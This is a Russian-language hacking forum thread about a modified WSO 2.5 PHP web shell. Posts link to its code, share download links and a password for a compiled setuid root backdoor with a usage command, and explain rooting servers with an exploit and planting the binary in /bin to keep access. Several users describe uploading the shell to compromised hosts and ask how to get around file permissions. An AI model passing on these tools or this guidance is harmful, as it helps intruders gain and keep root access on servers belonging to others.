WSO 2.5 Modified

Discussion in 'Избранное' started by randman, 6 Aug 2011.

  1. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Делал модификацию под себя, за основу взял последнюю версию WSO, и все же решил выложить, так как многим эта опция нужна.
    Добавлена опция дампа определенных колонок таблиц.
    Скриншот:
    [​IMG]

    Код на pastebin.com: http://pastebin.com/WvZTc46s
     
    1 person likes this.
  2. KeepInTouch

    KeepInTouch New Member

    Joined:
    14 Oct 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    В WSO из первого поста есть ошибка в параметрах:

    Правьте)
    Готовый запакованный вариант: http://pastebin.com/7fn3hebC
     
  3. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Может, это сойдёт?
    PHP:
    function DLE()
     {
    ...
     }
    if(
    DLE())
     {
    echo 
    "ok";
     }
    else{
    echo 
    "Fffuu";
    }
     
  4. SimbyOS

    SimbyOS Banned

    Joined:
    22 Nov 2011
    Messages:
    33
    Likes Received:
    5
    Reputations:
    10
    Классный шелл!
    Заливаю только этот шелл так как другие далеко позади!
     
  5. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Как сделать дамп БД через этот шелл?
     
  6. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    727
    Likes Received:
    26
    Reputations:
    -6
    как отредактировать .htaccess через wso ? нехватает прав как быть какие есть варианты обхода помогите
     
    #46 boortyhuhtyu, 27 Nov 2011
    Last edited: 27 Nov 2011
  7. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    ссылка сдохла!
    скиньте ещё раз Скомпилированный суидник плз!
    и появилась ещё проблемка,после того как прописал всё суид,пасс,всё прошло,но когда нажал на YES,то сервер лёг сразу,не открывает не один сайт!
    в чём может быть проблемма?
     
    #47 Faaax, 5 Dec 2011
    Last edited: 5 Dec 2011
  8. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Самому не скомпилить чтоли?

    1) Просто суидник: http://www.sendspace.com/file/hgwwez
    2) Суидник собранный со -static: http://www.sendspace.com/file/gmeycj

    Пасс на судник: 112s233

    Использование: ./suid 112s233 'uname -a; id'
     
  9. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    да уже скомпилил!
    но вот следующий вопрос остаётся открытым!
    после того как прописал всё суид,пасс,всё прошло,но когда нажал на YES,то сервер лёг сразу,не открывает не один сайт!
    в чём может быть проблемма?
    серв до сих пор лежит!
     
  10. 1NtR0

    1NtR0 Elder - Старейшина

    Joined:
    14 Apr 2007
    Messages:
    235
    Likes Received:
    89
    Reputations:
    35
    глючный какой-то мод, сохранил suid, теперь на шелл не заходит:

    Query did not return anything
     
  11. BLurpi^_^

    BLurpi^_^ Banned

    Joined:
    9 Feb 2011
    Messages:
    218
    Likes Received:
    26
    Reputations:
    9
    адрес пхп неверно указал
     
  12. vobbs

    vobbs New Member

    Joined:
    13 Dec 2011
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Друзья, объясните дураку смысл не root суидника ?
     
  13. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Говоря на твоём языке - когда запускаешь суидник, (если он правильно настроен и туда закачен..) то ты получаешь рут, например, открываешь консоль, пишешь whoami, а те сервак отвечает www, ты юзаешь суидник, /bin/suid затем смотришь whoami, o_O - root ;)

    А суидник без рута просто не нужен, грубо говоря на то и суид - чтобы рута клепать)
     
  14. edger

    edger Member

    Joined:
    9 Jul 2011
    Messages:
    52
    Likes Received:
    9
    Reputations:
    1
    Человеки добрые, подскажите в чём дело:
    На ломе прекрасно открывается данный шел из этой темы, только не работают Actions.
    Но не открывается вообще шел без модификации этой ( http://forum.antichat.ru/thread103155-wso.html ) пишет про ошибку:

    "Parse error: syntax error, unexpected ')', expecting '(' in лом/wso2.php on line 595
     
    #54 edger, 25 Dec 2011
    Last edited: 25 Dec 2011
  15. vobbs

    vobbs New Member

    Joined:
    13 Dec 2011
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Когда я запускаю суидник он выполняется под владельцем. Но так как я его сам и залил, то никакого рута не получить.
     
  16. vobbs

    vobbs New Member

    Joined:
    13 Dec 2011
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Стоит скоба там, где ее не должно стоять. А именно в 595 строке. Исправь
     
  17. edger

    edger Member

    Joined:
    9 Jul 2011
    Messages:
    52
    Likes Received:
    9
    Reputations:
    1
    В том то и дело, что всё в файле норм. Качаю прямо из топика автора, переименовываю, исправляю хеш пароля, заливаю на лом. Больше никаких исправлений не делаю :(
     
  18. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Простым смертным юзерам, www к примеру, не залить суидник в /bin/ т.к эта папка запрещена на запись, и нужно для начала сплойтом рутануть сервак, из под консоли (или сделать права), копирнуть суидник в /bin/ и затем запускать его чтобы получить рут, то есть чтобы не юзать каждый раз сплоит...
     
  19. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    Так ты что хочешь то? Именно чтоб суидник работал под нужным тебе юзверем(ftp например), а не под веб-сервером? В таком случае нужно в коде суидника прописать uid и guid юзверя, а не рута(0). Можно еще настроить php как cgi/fcgi - тогда все скрипты будут работать от того же юзера, что и владелец файлов(обычно тот же, что и ftp и ssh твоего аккаунта).
     
  20. vobbs

    vobbs New Member

    Joined:
    13 Dec 2011
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Зачем его заливать в bin ?